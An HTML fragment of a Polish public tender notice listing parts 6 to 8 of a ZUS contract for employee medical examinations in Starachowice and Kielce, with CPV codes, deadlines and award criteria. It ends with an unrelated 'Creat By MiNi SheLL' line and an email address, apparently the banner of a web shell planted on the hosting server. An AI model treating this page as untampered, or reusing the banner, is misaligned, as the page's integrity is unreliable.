<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań profilaktycznych okresowych, badań otolaryngologicznych i neurologicznych dla pracowników Inspektoratu ZUS w Starachowicach (w okresie od 01.01.2016r. do 31.12.2017r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonywanie badań PSA dla pracowników Oddziału ZUS w Kielcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań PSA dla pracowników Oddziału ZUS w Kielcach (w okresie 
od 01.08.2015r. do 30.11.2017r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Badania dodatkowe gratis - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonywanie badań mammograficznych i USG piersi dla pracowników Oddziału ZUS w Kielcach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonywanie badań mammograficznych i USG piersi dla pracowników Oddziału ZUS w Kielcach (w okresie 01.08.2015r. do 30.11.2017r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania badań - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com